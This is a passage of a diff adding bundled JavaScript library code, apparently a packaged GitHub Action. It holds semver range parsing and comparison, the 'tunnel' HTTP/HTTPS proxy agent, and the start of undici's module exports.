!== b + + case '': + case '=': + case '==': + return eq(a, b, loose) + + case '!=': + return neq(a, b, loose) + + case '>': + return gt(a, b, loose) + + case '>=': + return gte(a, b, loose) + + case '<': + return lt(a, b, loose) + + case '<=': + return lte(a, b, loose) + + default: + throw new TypeError('Invalid operator: ' + op) + } +} + +exports.Comparator = Comparator +function Comparator (comp, options) { + if (!options || typeof options !== 'object') { + options = { + loose: !!options, + includePrerelease: false + } + } + + if (comp instanceof Comparator) { + if (comp.loose === !!options.loose) { + return comp + } else { + comp = comp.value + } + } + + if (!(this instanceof Comparator)) { + return new Comparator(comp, options) + } + + comp = comp.trim().split(/\s+/).join(' ') + debug('comparator', comp, options) + this.options = options + this.loose = !!options.loose + this.parse(comp) + + if (this.semver === ANY) { + this.value = '' + } else { + this.value = this.operator + this.semver.version + } + + debug('comp', this) +} + +var ANY = {} +Comparator.prototype.parse = function (comp) { + var r = this.options.loose ? safeRe[t.COMPARATORLOOSE] : safeRe[t.COMPARATOR] + var m = comp.match(r) + + if (!m) { + throw new TypeError('Invalid comparator: ' + comp) + } + + this.operator = m[1] !== undefined ? m[1] : '' + if (this.operator === '=') { + this.operator = '' + } + + // if it literally is just '>' or '' then allow anything. + if (!m[2]) { + this.semver = ANY + } else { + this.semver = new SemVer(m[2], this.options.loose) + } +} + +Comparator.prototype.toString = function () { + return this.value +} + +Comparator.prototype.test = function (version) { + debug('Comparator.test', version, this.options.loose) + + if (this.semver === ANY || version === ANY) { + return true + } + + if (typeof version === 'string') { + try { + version = new SemVer(version, this.options) + } catch (er) { + return false + } + } + + return cmp(version, this.operator, this.semver, this.options) +} + +Comparator.prototype.intersects = function (comp, options) { + if (!(comp instanceof Comparator)) { + throw new TypeError('a Comparator is required') + } + + if (!options || typeof options !== 'object') { + options = { + loose: !!options, + includePrerelease: false + } + } + + var rangeTmp + + if (this.operator === '') { + if (this.value === '') { + return true + } + rangeTmp = new Range(comp.value, options) + return satisfies(this.value, rangeTmp, options) + } else if (comp.operator === '') { + if (comp.value === '') { + return true + } + rangeTmp = new Range(this.value, options) + return satisfies(comp.semver, rangeTmp, options) + } + + var sameDirectionIncreasing = + (this.operator === '>=' || this.operator === '>') && + (comp.operator === '>=' || comp.operator === '>') + var sameDirectionDecreasing = + (this.operator === '<=' || this.operator === '<') && + (comp.operator === '<=' || comp.operator === '<') + var sameSemVer = this.semver.version === comp.semver.version + var differentDirectionsInclusive = + (this.operator === '>=' || this.operator === '<=') && + (comp.operator === '>=' || comp.operator === '<=') + var oppositeDirectionsLessThan = + cmp(this.semver, '<', comp.semver, options) && + ((this.operator === '>=' || this.operator === '>') && + (comp.operator === '<=' || comp.operator === '<')) + var oppositeDirectionsGreaterThan = + cmp(this.semver, '>', comp.semver, options) && + ((this.operator === '<=' || this.operator === '<') && + (comp.operator === '>=' || comp.operator === '>')) + + return sameDirectionIncreasing || sameDirectionDecreasing || + (sameSemVer && differentDirectionsInclusive) || + oppositeDirectionsLessThan || oppositeDirectionsGreaterThan +} + +exports.Range = Range +function Range (range, options) { + if (!options || typeof options !== 'object') { + options = { + loose: !!options, + includePrerelease: false + } + } + + if (range instanceof Range) { + if (range.loose === !!options.loose && + range.includePrerelease === !!options.includePrerelease) { + return range + } else { + return new Range(range.raw, options) + } + } + + if (range instanceof Comparator) { + return new Range(range.value, options) + } + + if (!(this instanceof Range)) { + return new Range(range, options) + } + + this.options = options + this.loose = !!options.loose + this.includePrerelease = !!options.includePrerelease + + // First reduce all whitespace as much as possible so we do not have to rely + // on potentially slow regexes like \s*. This is then stored and used for + // future error messages as well. + this.raw = range + .trim() + .split(/\s+/) + .join(' ') + + // First, split based on boolean or || + this.set = this.raw.split('||').map(function (range) { + return this.parseRange(range.trim()) + }, this).filter(function (c) { + // throw out any that are not relevant for whatever reason + return c.length + }) + + if (!this.set.length) { + throw new TypeError('Invalid SemVer Range: ' + this.raw) + } + + this.format() +} + +Range.prototype.format = function () { + this.range = this.set.map(function (comps) { + return comps.join(' ').trim() + }).join('||').trim() + return this.range +} + +Range.prototype.toString = function () { + return this.range +} + +Range.prototype.parseRange = function (range) { + var loose = this.options.loose + // `1.2.3 - 1.2.4` => `>=1.2.3 <=1.2.4` + var hr = loose ? safeRe[t.HYPHENRANGELOOSE] : safeRe[t.HYPHENRANGE] + range = range.replace(hr, hyphenReplace) + debug('hyphen replace', range) + // `> 1.2.3 < 1.2.5` => `>1.2.3 <1.2.5` + range = range.replace(safeRe[t.COMPARATORTRIM], comparatorTrimReplace) + debug('comparator trim', range, safeRe[t.COMPARATORTRIM]) + + // `~ 1.2.3` => `~1.2.3` + range = range.replace(safeRe[t.TILDETRIM], tildeTrimReplace) + + // `^ 1.2.3` => `^1.2.3` + range = range.replace(safeRe[t.CARETTRIM], caretTrimReplace) + + // normalize spaces + range = range.split(/\s+/).join(' ') + + // At this point, the range is completely trimmed and + // ready to be split into comparators. + + var compRe = loose ? safeRe[t.COMPARATORLOOSE] : safeRe[t.COMPARATOR] + var set = range.split(' ').map(function (comp) { + return parseComparator(comp, this.options) + }, this).join(' ').split(/\s+/) + if (this.options.loose) { + // in loose mode, throw out any that are not valid comparators + set = set.filter(function (comp) { + return !!comp.match(compRe) + }) + } + set = set.map(function (comp) { + return new Comparator(comp, this.options) + }, this) + + return set +} + +Range.prototype.intersects = function (range, options) { + if (!(range instanceof Range)) { + throw new TypeError('a Range is required') + } + + return this.set.some(function (thisComparators) { + return ( + isSatisfiable(thisComparators, options) && + range.set.some(function (rangeComparators) { + return ( + isSatisfiable(rangeComparators, options) && + thisComparators.every(function (thisComparator) { + return rangeComparators.every(function (rangeComparator) { + return thisComparator.intersects(rangeComparator, options) + }) + }) + ) + }) + ) + }) +} + +// take a set of comparators and determine whether there +// exists a version which can satisfy it +function isSatisfiable (comparators, options) { + var result = true + var remainingComparators = comparators.slice() + var testComparator = remainingComparators.pop() + + while (result && remainingComparators.length) { + result = remainingComparators.every(function (otherComparator) { + return testComparator.intersects(otherComparator, options) + }) + + testComparator = remainingComparators.pop() + } + + return result +} + +// Mostly just for testing and legacy API reasons +exports.toComparators = toComparators +function toComparators (range, options) { + return new Range(range, options).set.map(function (comp) { + return comp.map(function (c) { + return c.value + }).join(' ').trim().split(' ') + }) +} + +// comprised of xranges, tildes, stars, and gtlt's at this point. +// already replaced the hyphen ranges +// turn into a set of JUST comparators. +function parseComparator (comp, options) { + debug('comp', comp, options) + comp = replaceCarets(comp, options) + debug('caret', comp) + comp = replaceTildes(comp, options) + debug('tildes', comp) + comp = replaceXRanges(comp, options) + debug('xrange', comp) + comp = replaceStars(comp, options) + debug('stars', comp) + return comp +} + +function isX (id) { + return !id || id.toLowerCase() === 'x' || id === '*' +} + +// ~, ~> --> * (any, kinda silly) +// ~2, ~2.x, ~2.x.x, ~>2, ~>2.x ~>2.x.x --> >=2.0.0 <3.0.0 +// ~2.0, ~2.0.x, ~>2.0, ~>2.0.x --> >=2.0.0 <2.1.0 +// ~1.2, ~1.2.x, ~>1.2, ~>1.2.x --> >=1.2.0 <1.3.0 +// ~1.2.3, ~>1.2.3 --> >=1.2.3 <1.3.0 +// ~1.2.0, ~>1.2.0 --> >=1.2.0 <1.3.0 +function replaceTildes (comp, options) { + return comp.trim().split(/\s+/).map(function (comp) { + return replaceTilde(comp, options) + }).join(' ') +} + +function replaceTilde (comp, options) { + var r = options.loose ? safeRe[t.TILDELOOSE] : safeRe[t.TILDE] + return comp.replace(r, function (_, M, m, p, pr) { + debug('tilde', comp, _, M, m, p, pr) + var ret + + if (isX(M)) { + ret = '' + } else if (isX(m)) { + ret = '>=' + M + '.0.0 <' + (+M + 1) + '.0.0' + } else if (isX(p)) { + // ~1.2 == >=1.2.0 <1.3.0 + ret = '>=' + M + '.' + m + '.0 <' + M + '.' + (+m + 1) + '.0' + } else if (pr) { + debug('replaceTilde pr', pr) + ret = '>=' + M + '.' + m + '.' + p + '-' + pr + + ' <' + M + '.' + (+m + 1) + '.0' + } else { + // ~1.2.3 == >=1.2.3 <1.3.0 + ret = '>=' + M + '.' + m + '.' + p + + ' <' + M + '.' + (+m + 1) + '.0' + } + + debug('tilde return', ret) + return ret + }) +} + +// ^ --> * (any, kinda silly) +// ^2, ^2.x, ^2.x.x --> >=2.0.0 <3.0.0 +// ^2.0, ^2.0.x --> >=2.0.0 <3.0.0 +// ^1.2, ^1.2.x --> >=1.2.0 <2.0.0 +// ^1.2.3 --> >=1.2.3 <2.0.0 +// ^1.2.0 --> >=1.2.0 <2.0.0 +function replaceCarets (comp, options) { + return comp.trim().split(/\s+/).map(function (comp) { + return replaceCaret(comp, options) + }).join(' ') +} + +function replaceCaret (comp, options) { + debug('caret', comp, options) + var r = options.loose ? safeRe[t.CARETLOOSE] : safeRe[t.CARET] + return comp.replace(r, function (_, M, m, p, pr) { + debug('caret', comp, _, M, m, p, pr) + var ret + + if (isX(M)) { + ret = '' + } else if (isX(m)) { + ret = '>=' + M + '.0.0 <' + (+M + 1) + '.0.0' + } else if (isX(p)) { + if (M === '0') { + ret = '>=' + M + '.' + m + '.0 <' + M + '.' + (+m + 1) + '.0' + } else { + ret = '>=' + M + '.' + m + '.0 <' + (+M + 1) + '.0.0' + } + } else if (pr) { + debug('replaceCaret pr', pr) + if (M === '0') { + if (m === '0') { + ret = '>=' + M + '.' + m + '.' + p + '-' + pr + + ' <' + M + '.' + m + '.' + (+p + 1) + } else { + ret = '>=' + M + '.' + m + '.' + p + '-' + pr + + ' <' + M + '.' + (+m + 1) + '.0' + } + } else { + ret = '>=' + M + '.' + m + '.' + p + '-' + pr + + ' <' + (+M + 1) + '.0.0' + } + } else { + debug('no pr') + if (M === '0') { + if (m === '0') { + ret = '>=' + M + '.' + m + '.' + p + + ' <' + M + '.' + m + '.' + (+p + 1) + } else { + ret = '>=' + M + '.' + m + '.' + p + + ' <' + M + '.' + (+m + 1) + '.0' + } + } else { + ret = '>=' + M + '.' + m + '.' + p + + ' <' + (+M + 1) + '.0.0' + } + } + + debug('caret return', ret) + return ret + }) +} + +function replaceXRanges (comp, options) { + debug('replaceXRanges', comp, options) + return comp.split(/\s+/).map(function (comp) { + return replaceXRange(comp, options) + }).join(' ') +} + +function replaceXRange (comp, options) { + comp = comp.trim() + var r = options.loose ? safeRe[t.XRANGELOOSE] : safeRe[t.XRANGE] + return comp.replace(r, function (ret, gtlt, M, m, p, pr) { + debug('xRange', comp, ret, gtlt, M, m, p, pr) + var xM = isX(M) + var xm = xM || isX(m) + var xp = xm || isX(p) + var anyX = xp + + if (gtlt === '=' && anyX) { + gtlt = '' + } + + // if we're including prereleases in the match, then we need + // to fix this to -0, the lowest possible prerelease value + pr = options.includePrerelease ? '-0' : '' + + if (xM) { + if (gtlt === '>' || gtlt === '<') { + // nothing is allowed + ret = '<0.0.0-0' + } else { + // nothing is forbidden + ret = '*' + } + } else if (gtlt && anyX) { + // we know patch is an x, because we have any x at all. + // replace X with 0 + if (xm) { + m = 0 + } + p = 0 + + if (gtlt === '>') { + // >1 => >=2.0.0 + // >1.2 => >=1.3.0 + // >1.2.3 => >= 1.2.4 + gtlt = '>=' + if (xm) { + M = +M + 1 + m = 0 + p = 0 + } else { + m = +m + 1 + p = 0 + } + } else if (gtlt === '<=') { + // <=0.7.x is actually <0.8.0, since any 0.7.x should + // pass. Similarly, <=7.x is actually <8.0.0, etc. + gtlt = '<' + if (xm) { + M = +M + 1 + } else { + m = +m + 1 + } + } + + ret = gtlt + M + '.' + m + '.' + p + pr + } else if (xm) { + ret = '>=' + M + '.0.0' + pr + ' <' + (+M + 1) + '.0.0' + pr + } else if (xp) { + ret = '>=' + M + '.' + m + '.0' + pr + + ' <' + M + '.' + (+m + 1) + '.0' + pr + } + + debug('xRange return', ret) + + return ret + }) +} + +// Because * is AND-ed with everything else in the comparator, +// and '' means "any version", just remove the *s entirely. +function replaceStars (comp, options) { + debug('replaceStars', comp, options) + // Looseness is ignored here. star is always as loose as it gets! + return comp.trim().replace(safeRe[t.STAR], '') +} + +// This function is passed to string.replace(re[t.HYPHENRANGE]) +// M, m, patch, prerelease, build +// 1.2 - 3.4.5 => >=1.2.0 <=3.4.5 +// 1.2.3 - 3.4 => >=1.2.0 <3.5.0 Any 3.4.x will do +// 1.2 - 3.4 => >=1.2.0 <3.5.0 +function hyphenReplace ($0, + from, fM, fm, fp, fpr, fb, + to, tM, tm, tp, tpr, tb) { + if (isX(fM)) { + from = '' + } else if (isX(fm)) { + from = '>=' + fM + '.0.0' + } else if (isX(fp)) { + from = '>=' + fM + '.' + fm + '.0' + } else { + from = '>=' + from + } + + if (isX(tM)) { + to = '' + } else if (isX(tm)) { + to = '<' + (+tM + 1) + '.0.0' + } else if (isX(tp)) { + to = '<' + tM + '.' + (+tm + 1) + '.0' + } else if (tpr) { + to = '<=' + tM + '.' + tm + '.' + tp + '-' + tpr + } else { + to = '<=' + to + } + + return (from + ' ' + to).trim() +} + +// if ANY of the sets match ALL of its comparators, then pass +Range.prototype.test = function (version) { + if (!version) { + return false + } + + if (typeof version === 'string') { + try { + version = new SemVer(version, this.options) + } catch (er) { + return false + } + } + + for (var i = 0; i < this.set.length; i++) { + if (testSet(this.set[i], version, this.options)) { + return true + } + } + return false +} + +function testSet (set, version, options) { + for (var i = 0; i < set.length; i++) { + if (!set[i].test(version)) { + return false + } + } + + if (version.prerelease.length && !options.includePrerelease) { + // Find the set of versions that are allowed to have prereleases + // For example, ^1.2.3-pr.1 desugars to >=1.2.3-pr.1 <2.0.0 + // That should allow `1.2.3-pr.2` to pass. + // However, `1.2.4-alpha.notready` should NOT be allowed, + // even though it's within the range set by the comparators. + for (i = 0; i < set.length; i++) { + debug(set[i].semver) + if (set[i].semver === ANY) { + continue + } + + if (set[i].semver.prerelease.length > 0) { + var allowed = set[i].semver + if (allowed.major === version.major && + allowed.minor === version.minor && + allowed.patch === version.patch) { + return true + } + } + } + + // Version has a -pre, but it's not one of the ones we like. + return false + } + + return true +} + +exports.satisfies = satisfies +function satisfies (version, range, options) { + try { + range = new Range(range, options) + } catch (er) { + return false + } + return range.test(version) +} + +exports.maxSatisfying = maxSatisfying +function maxSatisfying (versions, range, options) { + var max = null + var maxSV = null + try { + var rangeObj = new Range(range, options) + } catch (er) { + return null + } + versions.forEach(function (v) { + if (rangeObj.test(v)) { + // satisfies(v, range, options) + if (!max || maxSV.compare(v) === -1) { + // compare(max, v, true) + max = v + maxSV = new SemVer(max, options) + } + } + }) + return max +} + +exports.minSatisfying = minSatisfying +function minSatisfying (versions, range, options) { + var min = null + var minSV = null + try { + var rangeObj = new Range(range, options) + } catch (er) { + return null + } + versions.forEach(function (v) { + if (rangeObj.test(v)) { + // satisfies(v, range, options) + if (!min || minSV.compare(v) === 1) { + // compare(min, v, true) + min = v + minSV = new SemVer(min, options) + } + } + }) + return min +} + +exports.minVersion = minVersion +function minVersion (range, loose) { + range = new Range(range, loose) + + var minver = new SemVer('0.0.0') + if (range.test(minver)) { + return minver + } + + minver = new SemVer('0.0.0-0') + if (range.test(minver)) { + return minver + } + + minver = null + for (var i = 0; i < range.set.length; ++i) { + var comparators = range.set[i] + + comparators.forEach(function (comparator) { + // Clone to avoid manipulating the comparator's semver object. + var compver = new SemVer(comparator.semver.version) + switch (comparator.operator) { + case '>': + if (compver.prerelease.length === 0) { + compver.patch++ + } else { + compver.prerelease.push(0) + } + compver.raw = compver.format() + /* fallthrough */ + case '': + case '>=': + if (!minver || gt(minver, compver)) { + minver = compver + } + break + case '<': + case '<=': + /* Ignore maximum versions */ + break + /* istanbul ignore next */ + default: + throw new Error('Unexpected operation: ' + comparator.operator) + } + }) + } + + if (minver && range.test(minver)) { + return minver + } + + return null +} + +exports.validRange = validRange +function validRange (range, options) { + try { + // Return '*' instead of '' so that truthiness works. + // This will throw if it's invalid anyway + return new Range(range, options).range || '*' + } catch (er) { + return null + } +} + +// Determine if version is less than all the versions possible in the range +exports.ltr = ltr +function ltr (version, range, options) { + return outside(version, range, '<', options) +} + +// Determine if version is greater than all the versions possible in the range. +exports.gtr = gtr +function gtr (version, range, options) { + return outside(version, range, '>', options) +} + +exports.outside = outside +function outside (version, range, hilo, options) { + version = new SemVer(version, options) + range = new Range(range, options) + + var gtfn, ltefn, ltfn, comp, ecomp + switch (hilo) { + case '>': + gtfn = gt + ltefn = lte + ltfn = lt + comp = '>' + ecomp = '>=' + break + case '<': + gtfn = lt + ltefn = gte + ltfn = gt + comp = '<' + ecomp = '<=' + break + default: + throw new TypeError('Must provide a hilo val of "<" or ">"') + } + + // If it satisifes the range it is not outside + if (satisfies(version, range, options)) { + return false + } + + // From now on, variable terms are as if we're in "gtr" mode. + // but note that everything is flipped for the "ltr" function. + + for (var i = 0; i < range.set.length; ++i) { + var comparators = range.set[i] + + var high = null + var low = null + + comparators.forEach(function (comparator) { + if (comparator.semver === ANY) { + comparator = new Comparator('>=0.0.0') + } + high = high || comparator + low = low || comparator + if (gtfn(comparator.semver, high.semver, options)) { + high = comparator + } else if (ltfn(comparator.semver, low.semver, options)) { + low = comparator + } + }) + + // If the edge version comparator has a operator then our version + // isn't outside it + if (high.operator === comp || high.operator === ecomp) { + return false + } + + // If the lowest version comparator has an operator and our version + // is less than it then it isn't higher than the range + if ((!low.operator || low.operator === comp) && + ltefn(version, low.semver)) { + return false + } else if (low.operator === ecomp && ltfn(version, low.semver)) { + return false + } + } + return true +} + +exports.prerelease = prerelease +function prerelease (version, options) { + var parsed = parse(version, options) + return (parsed && parsed.prerelease.length) ? parsed.prerelease : null +} + +exports.intersects = intersects +function intersects (r1, r2, options) { + r1 = new Range(r1, options) + r2 = new Range(r2, options) + return r1.intersects(r2) +} + +exports.coerce = coerce +function coerce (version, options) { + if (version instanceof SemVer) { + return version + } + + if (typeof version === 'number') { + version = String(version) + } + + if (typeof version !== 'string') { + return null + } + + options = options || {} + + var match = null + if (!options.rtl) { + match = version.match(safeRe[t.COERCE]) + } else { + // Find the right-most coercible string that does not share + // a terminus with a more left-ward coercible string. + // Eg, '1.2.3.4' wants to coerce '2.3.4', not '3.4' or '4' + // + // Walk through the string checking with a /g regexp + // Manually set the index so as to pick up overlapping matches. + // Stop when we get a match that ends at the string end, since no + // coercible string can be more right-ward without the same terminus. + var next + while ((next = safeRe[t.COERCERTL].exec(version)) && + (!match || match.index + match[0].length !== version.length) + ) { + if (!match || + next.index + next[0].length !== match.index + match[0].length) { + match = next + } + safeRe[t.COERCERTL].lastIndex = next.index + next[1].length + next[2].length + } + // leave it in a clean state + safeRe[t.COERCERTL].lastIndex = -1 + } + + if (match === null) { + return null + } + + return parse(match[2] + + '.' + (match[3] || '0') + + '.' + (match[4] || '0'), options) +} + + +/***/ }), + +/***/ 4294: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +module.exports = __nccwpck_require__(4219); + + +/***/ }), + +/***/ 4219: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +var net = __nccwpck_require__(1808); +var tls = __nccwpck_require__(4404); +var http = __nccwpck_require__(3685); +var https = __nccwpck_require__(5687); +var events = __nccwpck_require__(2361); +var assert = __nccwpck_require__(9491); +var util = __nccwpck_require__(3837); + + +exports.httpOverHttp = httpOverHttp; +exports.httpsOverHttp = httpsOverHttp; +exports.httpOverHttps = httpOverHttps; +exports.httpsOverHttps = httpsOverHttps; + + +function httpOverHttp(options) { + var agent = new TunnelingAgent(options); + agent.request = http.request; + return agent; +} + +function httpsOverHttp(options) { + var agent = new TunnelingAgent(options); + agent.request = http.request; + agent.createSocket = createSecureSocket; + agent.defaultPort = 443; + return agent; +} + +function httpOverHttps(options) { + var agent = new TunnelingAgent(options); + agent.request = https.request; + return agent; +} + +function httpsOverHttps(options) { + var agent = new TunnelingAgent(options); + agent.request = https.request; + agent.createSocket = createSecureSocket; + agent.defaultPort = 443; + return agent; +} + + +function TunnelingAgent(options) { + var self = this; + self.options = options || {}; + self.proxyOptions = self.options.proxy || {}; + self.maxSockets = self.options.maxSockets || http.Agent.defaultMaxSockets; + self.requests = []; + self.sockets = []; + + self.on('free', function onFree(socket, host, port, localAddress) { + var options = toOptions(host, port, localAddress); + for (var i = 0, len = self.requests.length; i < len; ++i) { + var pending = self.requests[i]; + if (pending.host === options.host && pending.port === options.port) { + // Detect the request to connect same origin server, + // reuse the connection. + self.requests.splice(i, 1); + pending.request.onSocket(socket); + return; + } + } + socket.destroy(); + self.removeSocket(socket); + }); +} +util.inherits(TunnelingAgent, events.EventEmitter); + +TunnelingAgent.prototype.addRequest = function addRequest(req, host, port, localAddress) { + var self = this; + var options = mergeOptions({request: req}, self.options, toOptions(host, port, localAddress)); + + if (self.sockets.length >= this.maxSockets) { + // We are over limit so we'll add it to the queue. + self.requests.push(options); + return; + } + + // If we are under maxSockets create a new one. + self.createSocket(options, function(socket) { + socket.on('free', onFree); + socket.on('close', onCloseOrRemove); + socket.on('agentRemove', onCloseOrRemove); + req.onSocket(socket); + + function onFree() { + self.emit('free', socket, options); + } + + function onCloseOrRemove(err) { + self.removeSocket(socket); + socket.removeListener('free', onFree); + socket.removeListener('close', onCloseOrRemove); + socket.removeListener('agentRemove', onCloseOrRemove); + } + }); +}; + +TunnelingAgent.prototype.createSocket = function createSocket(options, cb) { + var self = this; + var placeholder = {}; + self.sockets.push(placeholder); + + var connectOptions = mergeOptions({}, self.proxyOptions, { + method: 'CONNECT', + path: options.host + ':' + options.port, + agent: false, + headers: { + host: options.host + ':' + options.port + } + }); + if (options.localAddress) { + connectOptions.localAddress = options.localAddress; + } + if (connectOptions.proxyAuth) { + connectOptions.headers = connectOptions.headers || {}; + connectOptions.headers['Proxy-Authorization'] = 'Basic ' + + new Buffer(connectOptions.proxyAuth).toString('base64'); + } + + debug('making CONNECT request'); + var connectReq = self.request(connectOptions); + connectReq.useChunkedEncodingByDefault = false; // for v0.6 + connectReq.once('response', onResponse); // for v0.6 + connectReq.once('upgrade', onUpgrade); // for v0.6 + connectReq.once('connect', onConnect); // for v0.7 or later + connectReq.once('error', onError); + connectReq.end(); + + function onResponse(res) { + // Very hacky. This is necessary to avoid http-parser leaks. + res.upgrade = true; + } + + function onUpgrade(res, socket, head) { + // Hacky. + process.nextTick(function() { + onConnect(res, socket, head); + }); + } + + function onConnect(res, socket, head) { + connectReq.removeAllListeners(); + socket.removeAllListeners(); + + if (res.statusCode !== 200) { + debug('tunneling socket could not be established, statusCode=%d', + res.statusCode); + socket.destroy(); + var error = new Error('tunneling socket could not be established, ' + + 'statusCode=' + res.statusCode); + error.code = 'ECONNRESET'; + options.request.emit('error', error); + self.removeSocket(placeholder); + return; + } + if (head.length > 0) { + debug('got illegal response body from proxy'); + socket.destroy(); + var error = new Error('got illegal response body from proxy'); + error.code = 'ECONNRESET'; + options.request.emit('error', error); + self.removeSocket(placeholder); + return; + } + debug('tunneling connection has established'); + self.sockets[self.sockets.indexOf(placeholder)] = socket; + return cb(socket); + } + + function onError(cause) { + connectReq.removeAllListeners(); + + debug('tunneling socket could not be established, cause=%s\n', + cause.message, cause.stack); + var error = new Error('tunneling socket could not be established, ' + + 'cause=' + cause.message); + error.code = 'ECONNRESET'; + options.request.emit('error', error); + self.removeSocket(placeholder); + } +}; + +TunnelingAgent.prototype.removeSocket = function removeSocket(socket) { + var pos = this.sockets.indexOf(socket) + if (pos === -1) { + return; + } + this.sockets.splice(pos, 1); + + var pending = this.requests.shift(); + if (pending) { + // If we have pending requests and a socket gets closed a new one + // needs to be created to take over in the pool for the one that closed. + this.createSocket(pending, function(socket) { + pending.request.onSocket(socket); + }); + } +}; + +function createSecureSocket(options, cb) { + var self = this; + TunnelingAgent.prototype.createSocket.call(self, options, function(socket) { + var hostHeader = options.request.getHeader('host'); + var tlsOptions = mergeOptions({}, self.options, { + socket: socket, + servername: hostHeader ? hostHeader.replace(/:.*$/, '') : options.host + }); + + // 0 is dummy port for v0.6 + var secureSocket = tls.connect(0, tlsOptions); + self.sockets[self.sockets.indexOf(socket)] = secureSocket; + cb(secureSocket); + }); +} + + +function toOptions(host, port, localAddress) { + if (typeof host === 'string') { // since v0.10 + return { + host: host, + port: port, + localAddress: localAddress + }; + } + return host; // for v0.11 or later +} + +function mergeOptions(target) { + for (var i = 1, len = arguments.length; i < len; ++i) { + var overrides = arguments[i]; + if (typeof overrides === 'object') { + var keys = Object.keys(overrides); + for (var j = 0, keyLen = keys.length; j < keyLen; ++j) { + var k = keys[j]; + if (overrides[k] !== undefined) { + target[k] = overrides[k]; + } + } + } + } + return target; +} + + +var debug; +if (process.env.NODE_DEBUG && /\btunnel\b/.test(process.env.NODE_DEBUG)) { + debug = function() { + var args = Array.prototype.slice.call(arguments); + if (typeof args[0] === 'string') { + args[0] = 'TUNNEL: ' + args[0]; + } else { + args.unshift('TUNNEL:'); + } + console.error.apply(console, args); + } +} else { + debug = function() {}; +} +exports.debug = debug; // for test + + +/***/ }), + +/***/ 1773: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const Client = __nccwpck_require__(3598) +const Dispatcher = __nccwpck_require__(412) +const errors = __nccwpck_require__(8045) +const Pool = __nccwpck_require__(4634) +const BalancedPool = __nccwpck_require__(7931) +const Agent = __nccwpck_require__(7890) +const util = __nccwpck_require__(3983) +const { InvalidArgumentError } = errors +const api = __nccwpck_require__(4059) +const buildConnector = __nccwpck_require__(2067) +const MockClient = __nccwpck_require__(8687) +const MockAgent = __nccwpck_require__(6771) +const MockPool = __nccwpck_require__(6193) +const mockErrors = __nccwpck_require__(888) +const ProxyAgent = __nccwpck_require__(7858) +const RetryHandler = __nccwpck_require__(2286) +const { getGlobalDispatcher, setGlobalDispatcher } = __nccwpck_require__(1892) +const DecoratorHandler = __nccwpck_require__(6930) +const RedirectHandler = __nccwpck_require__(2860) +const createRedirectInterceptor = __nccwpck_require__(8861) + +let hasCrypto +try { + __nccwpck_require__(6113) + hasCrypto = true +} catch { + hasCrypto = false +} + +Object.assign(Dispatcher.prototype, api) + +module.exports.Dispatcher = Dispatcher +module.exports.Client = Client +module.exports.Pool = Pool +module.exports.BalancedPool = BalancedPool +module.exports.Agent = Agent +module.exports.ProxyAgent = ProxyAgent +module.exports.RetryHandler = RetryHandler + +module.exports.DecoratorHandler = DecoratorHandler +module.exports.RedirectHandler = RedirectHandler +module.exports.createRedirectInterceptor = createRedirectInterceptor + +module.exports.buildConnector = buildConnector +module.exports.errors = errors + +function makeDispatcher (fn) { + return (url, opts, handler) => { + if (typeof opts === 'function') { + handler = opts + opts = null + } + + if (!url || (typeof url !== 'string' && typeof url !== 'object' && !(url instanceof URL))) { + throw new InvalidArgumentError('invalid url') + } + + if (opts != null && typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + if (opts && opts.path != null) { + if (typeof opts.path !== 'string') { + throw new InvalidArgumentError('invalid opts.path') + } + + let path = opts.path + if (!opts.path.startsWith('/')) { + path = `/${path}` + } + + url = new URL(util.parseOrigin(url).origin + path) + } else { + if (!opts) { + opts = typeof url === 'object' ? url : {} + } + + url = util.parseURL(url) + } + + const { agent, dispatcher = getGlobalDispatcher() } = opts + + if (agent) { + throw new InvalidArgumentError('unsupported opts.agent. Did you mean opts.client?') + } + + return fn.call(dispatcher, { + ...opts, + origin: url.origin, + path: url.search ? `${url.pathname}${url.search}` : url.pathname, + method: opts.method || (opts.body ? 'PUT' : 'GET') + }, handler) + } +} + +module.exports.setGlobalDispatcher = setGlobalDispatcher +module.exports.getGlobalDispatcher = getGlobalDispatcher + +if (util.nodeMajor > 16 || (util.nodeMajor === 16 && util.nodeMinor >= 8)) { + let fetchImpl = null + module.exports.fetch = async function fetch (resource) { + if (!fetchImpl) { + fetchImpl = (__nccwpck_require__(4881).fetch) + } + + try { + return await fetchImpl(...arguments) + } catch (err) { + if (typeof err === 'object') { + Error.captureStackTrace(err, this) + } + + throw err + } + } + module.exports.Headers = __nccwpck_require__(554).Headers + module.exports.Response = __nccwpck_require__(7823).Response + module.exports.Request = __nccwpck_require__(8359).Request + module.exports.FormData = __nccwpck_require__(2015).FormData + module.exports.File = __nccwpck_require__(8511).File + module.exports.FileReader = __nccwpck_require__(1446).FileReader + + const { setGlobalOrigin, getGlobalOrigin } = __nccwpck_require__(1246) + + module.exports.setGlobalOrigin = setGlobalOrigin + module.exports.getGlobalOrigin = getGlobalOrigin + + const { CacheStorage } = __nccwpck_require__(7907) + const { kConstruct } = __nccwpck_require__(9174) + + // Cache & CacheStorage are tightly coupled with fetch. Even if it may run + // in an older version of Node, it doesn't have any use without fetch. + module.exports.caches = new CacheStorage(kConstruct) +} + +if (util.nodeMajor >= 16) { + const { deleteCookie, getCookies, getSetCookies, setCookie } = __nccwpck_require__(1724) + + module.exports.deleteCookie = deleteCookie + module.exports.getCookies = getCookies + module.exports.getSetCookies = getSetCookies + module.exports.setCookie = setCookie + + const { parseMIMEType, serializeAMimeType } = __nccwpck_require__(685) + + module.exports.parseMIMEType = parseMIMEType + module.exports.serializeAMimeType = serializeAMimeType +} + +if (util.nodeMajor >= 18 && hasCrypto) { + const { WebSocket } = __nccwpck_require__(4284) + + module.exports.WebSocket = WebSocket +} + +module.exports.request = makeDispatcher(api.request) +module.exports.stream = makeDispatcher(api.stream) +module.exports.pipeline = makeDispatcher(api.pipeline) +module.exports.connect = makeDispatcher(api.connect) +module.exports.upgrade = makeDispatcher(api.upgrade) + +module.exports.MockClient = MockClient +module.exports.MockPool = MockPool +module.exports.MockAgent = MockAgent +module.exports.mockErrors = mockErrors + + +/***/ }), + +/***/ 7890: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { InvalidArgumentError } = __nccwpck_require__(8045) +const { kClients, kRunning, kClose, kDestroy, kDispatch, kInterceptors } = __nccwpck_require__(2785) 